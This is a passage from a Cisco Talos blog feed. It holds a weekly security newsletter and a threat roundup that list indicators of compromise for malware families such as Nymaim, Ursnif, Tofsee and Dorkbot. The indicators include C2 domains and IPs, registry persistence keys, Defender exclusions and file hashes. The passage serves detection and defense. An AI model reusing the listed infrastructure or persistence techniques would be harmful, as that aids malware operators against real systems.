Quantcast
Channel: Cisco Talos Blog
Viewing all 2037 articles
Browse latest View live

Threat Source newsletter (Sept. 5, 2019)

$
0
0

Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

By now, nearly everyone has heard of BlueKeep. It definitely sounds scary, with of this talk of wormable bugs and WannaCry. But so far, no attackers have used it to launch a large-scale attack.

Of course, we knew this wouldn’t stay quiet forever. Last month, Microsoft disclosed more RDP vulnerabilities in what’s being called “DejaBlue.” These are another set of wormable bugs, but we have a walkthrough for how Cisco Firepower customers can stay protected.

Elsewhere on the vulnerability front, we have advisories out for an information disclosure in Blynk-Library and two bugs in Epignosis eFront.

We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

Upcoming public engagements with Talos

Event: “DNS on Fire” at Virus Bulletin 2019
Location: Novotel London West hotel, London, U.K.
Date: Oct. 2 - 4
Speaker: Warren Mercer and Paul Rascagneres
Synopsis: In this talk, Paul and Warren will walk through two campaigns Talos discovered targeted DNS. The first actor developed a piece of malware, named “DNSpionage,” targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect DNSs from the targets and discovered some registered SSL certificates for them. The talk will go through the two actors’ tactics, techniques and procedures and the makeup of their targets.

Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
Location: Metro Toronto Convention Center, Toronto, Canada
Date: Oct. 7 - 10
Speaker: Edmund Brumaghin and Earl Carter
Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

Cyber Security Week in Review

  • A new study from IBM shows that American taxpayers do not support their tax money going toward paying ransomware extortion requests. The survey found that 80 percent of respondents say they are concerned about a ransomware attack on their city, and 60 percent say they would not want their government using taxpayer dollars to pay off attackers with the promise of returning stolen data.
  • A server containing millions of phone numbers linked to Facebook acccounts was found exposed online, including 133 million U.S. users. The server was not protected by a password, so anyone who found it could access it. 
  • The Federal Trade Commission and the state of New York levied a $170 million fine against YouTube for its mishandling of children’s data. YouTube will now require users uploading content targeted toward children to tag them as such, and will ask for parental consent before tracking children’s usage. 
  • A new report suggests there could be a link between companies and cities that have cyber insurance policies and those who are targeted by ransomware attacks. Organizations with insurance are also more likely to pay any requested extortion payments compared to those without policies. 
  • Chinese tech company Huawei accused the U.S. of launching cyber attacks against it to steal information. They also said the American government has used “unscrupulous means” to disrupt its business. 
  • A recently discovered group of malicious websites targeting mobile devices are believed to be sponsored by China to target Uyghur Muslims. The websites were able to infect iPhones and Android devices just by having the user open the site. 
  • An attack took down a popular online forum used by protestors in Hong Kong. Citizens there have spent weeks pushing back on policies that would closer align the region’s government with China. 
  • Congress introduced a bipartisan bill that would boost the federal government’s cyber defense systems. The proposed law would increase the amount of funding the Department of Homeland Security has to beef up federal government agencies’ internal security. 
  • Google Pixel owners began receiving Android 10 this week. The new mobile operating system includes new security and privacy features, including the ability to change location tracking services on an app-by-app basis on one screen. 

Notable recent security issues

Title: New protection fends off password-stealing attacks from popular VPN service
Description: Last week, attackers began launching password-stealing attacks against the Fortigate and Pulse VPN services. At the time, Cisco Talos released SNORT® rules to protect Pulse VPN, and there is now additional protection for Fortigate. Attackers are attempting to steal encryption keys, passwords and other important data from servers utilizing these two VPN services. These bugs can be exploited by sending the unpatched servers a specialized Web request that contains a special sequence of characters.
Snort SIDs: 51370 – 51372, 51387 (Written by John Levy) 

Title: Multiple vulnerabilities disclosed in Cisco NX-OS software 
Description: Cisco disclosed three denial-of-service vulnerabilities in its NX-OS software: CVE-2019-1965, CVE-2019-1964 and CVE-2019-1962. These bugs can cause a variety of conditions, including forced reboots, crashes or disruption of certain processes. All three are considered high-severity vulnerabilities.
Reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190828-nxos-memleak-dos 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190828-nxos-ipv6-dos 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190828-nxos-fsip-dos
Snort SIDs: 51365 - 51367 (Written by John Levy)

Most prevalent malware files this week

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3 
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256:9a082883ad89498af3ad8ece88d982736edbd46d65908617cf292cf7b5836dbc 
MD5: 7a6f7f930217521e47c7b8d91fb79649
Typical Filename: DHL Scan File.img
Claimed Product: IMGBURN V2.5.8.0 - THE ULTIMATE IMAGE BURNER!
Detection Name: W32.9A082883AD-100.SBX.TG

SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510 
MD5: 4a50780ddb3db16ebab57b0ca42da0fb
Typical Filename: xme64-2141.exe
Claimed Product: N/A
Detection Name: W32.7ACF71AFA8-95.SBX.TG

SHA 256: 1755c179f08a648a618043a5af2314d6a679d6bdf77d4d9fca5117ebd9f3ea7c 
MD5: c785a8b0be77a216a5223c41d8dd937f
Typical Filename: cslast.gif
Claimed Product: N/A
Detection Name: W32.1755C179F0-100.SBX.TG

SHA 256: 093cc39350b9dd2630a1b48372abc827251a3d37bd88c35cea2e784359b457d7 
MD5: 3c7be1dbe9eecfc73f4476bf18d1df3f
Typical Filename: sayext.gif
Claimed Product: N/A
Detection Name: W32.093CC39350-100.SBX.TG 

Threat Roundup for August 30 to September 6

$
0
0
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 30 and Sept. 6. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.
The most prevalent threats highlighted in this roundup are:
Threat NameTypeDescription
Win.Malware.Nymaim-7149347-1 Malware Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
Win.Malware.Ursnif-7149254-1 Malware Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
Win.Malware.Kuluoz-7149209-1 Malware Kuluoz, sometimes known as "Asprox," is a modular remote access trojan that is also known to download and execute follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.
Win.Dropper.Tofsee-7147648-0 Dropper Tofsee is multi-purpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator’s control.
Win.Trojan.Dorkbot-7146944-0 Trojan Dorkbot is a worm that spreads itself through social networking sites and messaging apps. Once installed, the infected computer becomes part of a botnet, allowing the controller to control the machine remotely.
Win.Ransomware.Gandcrab-7145847-0 Ransomware GandCrab is ransomware that encrypts documents, photos, databases and other important files typically using the file extension ".GDCB," ".CRAB" or ".KRAB." GandCrab is spread through both traditional spam campaigns, as well as multiple exploit kits, including Rig and GrandSoft.
Win.Malware.Phorpiex-7145044-1 Malware Phorpiex is a trojan and worm that infects machines to deliver follow-on malware. Phorpiex has been known to drop a wide range of payloads, including malware that sends spam emails, ransomware and cryptocurrency miners.
Win.Ransomware.Sage-7144073-1 Ransomware Sage ransomware encrypts files and then demands a payment for the files to be recovered. Sage typically spreads via malicious email attachments, and the encrypted file extensions vary.

Threat Breakdown

Win.Malware.Nymaim-7149347-1

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\GOCFK 16
<HKCU>\SOFTWARE\MICROSOFT\KPQL 16
<HKCU>\SOFTWARE\MICROSOFT\GOCFK
Value Name: mbijg
16
<HKCU>\SOFTWARE\MICROSOFT\KPQL
Value Name: efp
16
MutexesOccurrences
Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1}16
Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}16
Local\{D8E7AB94-6F65-71DE-8DA1-FE621BE2E606}16
Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5}16
Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368}16
Local\{0F53A50D-AEA8-402A-580B-3C32A490301E}16
Local\{42FDAA48-39A4-4464-9CC4-6F1A48111B12}16
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
gokxyba[.]net15
bkigzfz[.]com15
UPOEPRPAA[.]NET15
WJXVRSFRYJQ[.]PW15
gfjtjjgx[.]pw15
YZOBVXEI[.]NET15
DZLYHSMMLUL[.]PW15
EMKWQU[.]PW15
TQTZRZKIIID[.]COM15
MJWHLRF[.]NET15
tbblpqejav[.]pw13
fseqigbfr[.]in13
pscjvmzmy[.]in13
scvkmktqksu[.]pw13
ibypya[.]in13
hkfyto[.]pw13
qvrghscpr[.]in13
sbuhudow[.]pw13
yqofd[.]in13
luwjudefo[.]net13
uqzbwfz[.]net13
oangztra[.]com13
qanefmpvo[.]net13
chtugnzdw[.]com13
jcggrdthx[.]net13
*See JSON for more IOCs
Files and or directories createdOccurrences
%ProgramData%\ph16
%ProgramData%\ph\eqdw.dbc16
%ProgramData%\ph\fktiipx.ftf16
%TEMP%\gocf.ksv16
%TEMP%\kpqlnn.iuy16
%TEMP%\fro.dfx13
%TEMP%\npsosm.pan13
\Documents and Settings\All Users\pxs\dvf.evp13
\Documents and Settings\All Users\pxs\pil.ohu13

File Hashes

037d05e6a51414ff22c6f27f5758bab12a237fae5a8da61b3d9579e77cf68cc9 04f91d0532ceec2b0455ab9745dff5b423f34e8f32cee261db68ad28db024a08 123573d7840dccbc368911be620c2c839fcb81642abeaed5a67316c003bb67a4 2f485d4cf77a8079c75d584aed08d769b864ba76373250e583b7268a444fc2b4 6f7ef5eaa16f360e0ce570fe2196bc91ee133cb954a1d62ff9d4a72a1f0e2c45 78838c78442dd1afb4d1806e0eb81ddb4931a1f51dd021a24109a461105232c0 79158026c4d06723c530813c1e2a90024e88dddac9aa84cf0314f004eb49062c 792daabd16b1ceb49a85bccc8cdd8fcf8c21a9a0df3eb909e06df9cd81f786c7 7a06a8e0fc5ee2416369f3638bb42a7b4994fd2e74b89b6a533636de6f8a4a86 7c8ff85a4e95716c990a60b5f5a5992c0fe530e7a366f80bafbc6621ffff0fbb ac1887855401066432456e2890c97b7b303e08b7b65e20a8fd004052175a5b18 c19036fc9959e2003d48bb68b2cd6c95a6423b6fa7a434c7ce96d77d69c6e532 c1d686b25508f66fd32aaaeb1caccf0fd233f5303418a3658088205f543182a3 ca3a1e4d93207501cd2911bf88a92431ec5ef877b7b1a7200072c976339a07ae fc5b7ae3747c98d4658a0599130d5374c71bf2aa88483fab28d2e643e6283164 fcccfc04baab2622fbc4cf0ee2f47bd9eeb53e98a57a9754286805c0580ff79f

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Win.Malware.Ursnif-7149254-1

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: api-PQEC
10
<HKCU>\SOFTWARE\MICROSOFT\IAM
Value Name: Server ID
10
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 10
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER 10
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Client
10
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: {F50EA47E-D053-EF14-82F9-0493D63D7877}
10
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954}
10
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER
Value Name: PendingFileRenameOperations
10
MutexesOccurrences
Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}10
Local\{7FD07DA6-D223-0971-D423-264D4807BAD1}10
Local\{B1443895-5CF6-0B1E-EE75-506F02798413}10
{A7AAF118-DA27-71D5-1CCB-AE35102FC239}10
{C3863B40-467D-ED33-68A7-DA711CCBAE35}10
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
208[.]67[.]222[.]22210
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
resolver1[.]opendns[.]com10
222[.]222[.]67[.]208[.]in-addr[.]arpa10
myip[.]opendns[.]com10
jiauwnehbtqiwjeqwe[.]net10
Files and or directories createdOccurrences
\{4BC230AC-2EB3-B560-90AF-42B9C45396FD}10
%APPDATA%\Microsoft\Dmlogpui10
%APPDATA%\Microsoft\Dmlogpui\datat3hc.exe10
%TEMP%\<random, matching [A-F0-9]{4}>.bi19
%TEMP%\8A4.bi11

File Hashes

055f5a38fca8e55adb9e46bfc7dfe3b9094ad659bb473553881b0c72cc580120 2a88b621e291815db268dd8a9e95f2fbff5b2216358ed24eab198917fe65742b 3b306bbe5aaabdd008259ac755b50ac5c53144bd2f79b90d1f29c3c576172661 7cbc76561f75ead55fd3a776ba7b44d253783da767f4fb20b09616fa1039ac8b b2939cb18525d202ec9af8629b4ba0aaaab24e7b81bd5abd00fbb69d34a1dea5 c23a3dcbe61fb4877322c6f0e24476d9fd433ca013f62cc9f42a9cb62acf02f1 cd83db4c5a03f1fae1fa4183e70ea6a6acfc0657e45fbecabc48adfb281f39fe cf10ee7467a9ee13fe44e9ea9c2833dde4c5270909a75c5fd8b3ec3627a17af5 d257e0242bc63f343d6712fe05e5b8c9d9be84645e5a2063a1d12820aae450fa fb1eac4151a47e030a0d372c40fc3c70cd4ba76bc40571fa69d60f398196726a

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
Wsa N/A

Screenshots of Detection

AMP


ThreatGrid


Win.Malware.Kuluoz-7149209-1

Indicators of Compromise

MutexesOccurrences
2GVWNQJz1188
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
87[.]106[.]4[.]78129
95[.]141[.]29[.]195128
50[.]57[.]99[.]160126
188[.]116[.]23[.]96119
178[.]33[.]227[.]11114
91[.]227[.]26[.]178114
78[.]46[.]92[.]70110
91[.]220[.]215[.]29105
Files and or directories createdOccurrences
%LOCALAPPDATA%\etxaxetj.exe1
%LOCALAPPDATA%\eopjtjwg.exe1
%LOCALAPPDATA%\tfugpetb.exe1
%LOCALAPPDATA%\tjdsucos.exe1
%LOCALAPPDATA%\uxfuuarq.exe1
%LOCALAPPDATA%\lspsvmef.exe1
%LOCALAPPDATA%\addakgil.exe1
%LOCALAPPDATA%\gdsfuent.exe1
%LOCALAPPDATA%\kesjxiuw.exe1
%LOCALAPPDATA%\rvdhhicw.exe1
%LOCALAPPDATA%\odjotitr.exe1
%LOCALAPPDATA%\apferdrh.exe1
%LOCALAPPDATA%\mxdmpmxp.exe1
%LOCALAPPDATA%\jujldfjk.exe1
%LOCALAPPDATA%\lwmwmfsv.exe1
%LOCALAPPDATA%\sauuvxpt.exe1
%LOCALAPPDATA%\rvrsnrcv.exe1
%LOCALAPPDATA%\libwmqqa.exe1
%LOCALAPPDATA%\sfvadtvv.exe1
%LOCALAPPDATA%\cswmofrn.exe1
%LOCALAPPDATA%\hngjmrve.exe1
%LOCALAPPDATA%\jkqgumia.exe1
%LOCALAPPDATA%\cqeelolf.exe1
%LOCALAPPDATA%\ipatebes.exe1
%LOCALAPPDATA%\xmcejvax.exe1
*See JSON for more IOCs

File Hashes

01412a2d6877375f88d6b502600e45a26197396a1f0b019d8d10437729f52257 02205537e0ac5c8b8b66f53e8d2993b706a8f7fa5757346a7312db646a471143 0364c9b75b03b9ed56059c9bea7f8a8f81f13d2cfc061c0b6e13525dcc3bd7dd 0383d381bf8f010ebfe0215528a7289429052487a2fe90ce35eae0f7f11e1fea 05fa1a824e573e2db9dfbf4e3358a5f2c88956ae6a669f6336c42812a67a524f 06de3f442bfeee18831cebef86194b8166a188af312b739fb628c203e4d5f2ea 078e7fba23d21250e959935ba3ab9559dddad02240443543616eab37547ddd86 07b13ab67c36b30dc081deebdd0bc5a9319a3ddf05e17a5d4552c16ded433d4e 087d4788799c0e935673ef2572bebf8f86ca61e8966b2404e20432a417e73894 0909060506cdf2d77307b2ae36380fc7f85de0a9c1c103ca629d3089ba507df3 091b1cb41a31ffd75781295ec748bb6b82bc6624dd7853405304a08a322c51ec 0a482d15c908dd7b8936e0900fcabef622708b79cd2020c730376aec9c7ca388 0c04b5f60896203a5d39a707080f344d27aa39048f171e9284d6d8b665e226e5 0c86168150197d12329c57ad9c8d616a15f285483ba3cec4a9bb4ede46e4d234 0ce022144a2b3d712579d8a63c9c73109ac74eff4ad68f1b6fbd8f593c706aa6 0ce6ae758bdc6f4c44b249f4ecf327f5a00a238ebed3bbe8b06f317b91335f1c 0d3ce20b680e2dbf203a10e9c8ed97c4f7006be9b3a6fddbeb443937480d98b5 0de776cb80503f7daa3effefbb2739f9c927f028df4445fa051cb33377de359f 109a6498f4d7b51f0ede104d4bd8f78782913d641147930e07c6dc236dc04a94 126266edb2a41407ba26f72e127430dd5932b07ab2e312dfd09285bc9f5db40b 12e80c62f20986a8abe96df7be0c1b91d5fd32bef9781bf669d7a5d538af778c 13705e3f984dc79824e22fa9349c3704dbe5d67a606f59029622887379eeb302 14e13631f15fc311ef20c9e87ef28675dc14cd83ed871f44266811e103b45284 15381012927b9852633c0943aab2d0522dbf3d3d0a326e4b0e18e21ba29f6065 168c0dd6882307664579943b5786594e94435ccab43618aee5b04d6f974bda2c
*See JSON for more IOCs

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
Wsa N/A

Screenshots of Detection

AMP


ThreatGrid




Win.Dropper.Tofsee-7147648-0

Indicators of Compromise

Registry KeysOccurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config3
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
13
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
13
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
13
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
12
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\jcqwvdjy
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\unbhgouj
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\nguazhnc
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\zsgmltzo
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\yrflksyn
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\dwkqpxds
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\rkyedlrg
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\vocihpvk
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\fymsrzfu
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\mftzygmb
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\xqekjrxm
1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
239[.]255[.]255[.]25013
69[.]55[.]5[.]25013
172[.]217[.]3[.]10013
46[.]4[.]52[.]10913
176[.]111[.]49[.]4313
85[.]25[.]119[.]2513
144[.]76[.]199[.]213
144[.]76[.]199[.]4313
43[.]231[.]4[.]713
192[.]0[.]47[.]5913
95[.]181[.]178[.]1713
172[.]217[.]197[.]2713
67[.]195[.]228[.]11112
172[.]217[.]10[.]22711
64[.]233[.]186[.]2711
23[.]160[.]0[.]10810
172[.]217[.]5[.]22810
168[.]95[.]5[.]11710
188[.]125[.]72[.]7310
209[.]85[.]203[.]2710
213[.]209[.]1[.]1299
216[.]146[.]35[.]359
77[.]75[.]78[.]429
77[.]75[.]76[.]429
98[.]136[.]96[.]749
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
250[.]5[.]55[.]69[.]in-addr[.]arpa13
250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org13
250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org13
250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net13
whois[.]iana[.]org13
250[.]5[.]55[.]69[.]bl[.]spamcop[.]net13
whois[.]arin[.]net13
250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org13
microsoft-com[.]mail[.]protection[.]outlook[.]com13
honeypus[.]rusladies[.]cn13
marina99[.]ruladies[.]cn13
sexual-pattern3[.]com13
coolsex-finders5[.]com13
super-efectindating2[.]com13
mta5[.]am0[.]yahoodns[.]net12
hotmail-com[.]olc[.]protection[.]outlook[.]com11
www[.]google[.]co[.]uk11
mx-eu[.]mail[.]am0[.]yahoodns[.]net10
video-weaver[.]fra02[.]hls[.]ttvnw[.]net10
smtp-in[.]libero[.]it9
libero[.]it9
eur[.]olc[.]protection[.]outlook[.]com9
tiscali[.]it9
etb-1[.]mail[.]tiscali[.]it9
www[.]ebay[.]com9
*See JSON for more IOCs
Files and or directories createdOccurrences
%SystemRoot%\SysWOW64\config\systemprofile13
%TEMP%\<random, matching '[a-z]{8}'>.exe13
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>12
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy)10
%SystemRoot%\SysWOW64\config\systemprofile:.repos7
%TEMP%\tsielhm.exe1

File Hashes

07cbb12e22655ae68bae25e8aedee6bea64d0d430d77afb86227758740b1dfcd 1ef2f6a958ffc7e4c2733100f10b53baec777d197d345012d464c2e9987cdd43 461f7cb0c6be901935666279cc26d155df22ddffbd4d65372b6ffe9aa3f4ff31 4b57c99f86103e7b26c7bee052f5c5c92c6ac82c34f21ac1b8aa333887a51068 4f734c7197b0c73e62e042cdef1cb4dfb056bc5e144a44ec00f8239796b203a9 564e5e2f864ce52b923daf130c30efd97ba3eab872e04cc8849ed6133ed7abe8 69a09f081ee022239d1b11214da3f6cfc4c256c91c61f806faa71d1997ca31d9 a0738035727d477bae527df884eb986a9c8e6aea75a354782038e3840b6fa3af a2a94ca3039111688fe1304a3fd4ad245b79d0b6d2ce58bcecdcfdb1b34c0208 ad601c1a9bc018b918cbc9eb6c4ccd625f9096c01115a2eb4a7c1387f2bf1d10 afc2ab3eb8b9a23623603c03e7b7d1f0fca18b7b64f33976dd102681eb2a217a b1f1d675c5d97b3ecf4085f1326bf67e5b1ee0b30ed1499df1552283d5fde731 b2ba1ec34c107072d07a962d8ce3fbaefe195969c03be6a3d0dda19aef4665a2

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Win.Trojan.Dorkbot-7146944-0

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Znawav
25
MutexesOccurrences
hex-Mutex25
s5rBKCUVfOF8JLVi25
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
204[.]79[.]197[.]20025
13[.]107[.]21[.]20015
212[.]83[.]168[.]19613
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
api[.]wipmania[.]com13
update[.]jebac[.]net13
Files and or directories createdOccurrences
%APPDATA%\Znawav.exe25
%APPDATA%\Pwoiox.exe13

File Hashes

1b7787bd1726468e25ab200665e57b1b470b7ba531d60cee8642646443725cf8 1f2f1041c73af88cc46eb86719cf66e3b51da1c4d7ac70a80cc5b6e7ee4ad73a 20f7f4a0bd9e9e531df4c14276eb290f5cb7efc37156ec9ba46fa2a7891206f1 31012f9ba68cf7e8ac73561fee2c8b2e2a538196d264f3d4c3d89341e77e2495 33f4666ed81d7e61ccdae3a895aa21d670b714727ae68639aeb064f58e387744 39a3a1ccf3c4f36cc72bd45985058d31b02ee345fc844be3b94da5a4c5a03bb6 3d8aa371276f3f11f2640c559dc5edbc792f8126604cb0e8d0ac3c7e521d4f24 4388646391e39334c69e5ff223f0a17d8f3dd11e34921344a30f78772550ca03 4fcf9f3dcd2df360e1069126acd734ded1b43ea7a7dbb5912db0d23eea505bc9 53d77cbc31d6ada99bd858417c8a8ec67907a82e6bc20e8641a3f71cbcfbe4f3 642106449fb781a3f5de12b52b54c97961e61f76160ef8c169bd2b0615e98a2c 738a68fc7864cd87bfaa8336f87b8cdc888fe9fb918de29114b419e2944d29dc 791b43d7009c8bceb849274e51607d89283bddfa94d215ede8cc3bc76953f7a7 a2c072ec77e1736120ff202bfd7f23495921f04375e09fcedc43be1e61ce4a18 a4f42f84cb704690aa10a2ebdce33e964b67a57cee554019d33f1a7cd9d3f4f3 b5bc85bf00d89cc18ffd0749f4783e5c4dd855fa37ce6c37a97ac6e8aa0a10e7 bf1102d0fb6cff725e38c7a6f6ca0e538aebcc546b711f9a2d5fac84fdb981f4 cb95aedf7037adb0c4d756ca1ddb3038341ca20cb276156b782726eff3dfca99 def2ba6dc7842c6b35f09283b68aaa9558e7339ba4b4aa53da83bfed57188ecd e5cbafb8ceee5d6573f199acdff34ab85d2dcd0d0d8e4eb34bd1afed33fe405a ea0479b081905b195d7dc9f37f81cd07945691ab84b395013e2653594e40522e ee10cd27e27378d4ad3f6122168c3e60270031b337e90683481c061d192401f7 ef4abe8f4692c99b8d9bdc30b458d830905e6149ae1ae50bf7eb494f0c8bd229 f31763a353bf7a525e14f500f70c1924948db63d0bde94567dd908917f69133f f71e42635ad5e9c0edac076a736ee15dd705ee119e2d485cb27db7c203bd0e0b

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella


Win.Ransomware.Gandcrab-7145847-0

Indicators of Compromise

Registry KeysOccurrences
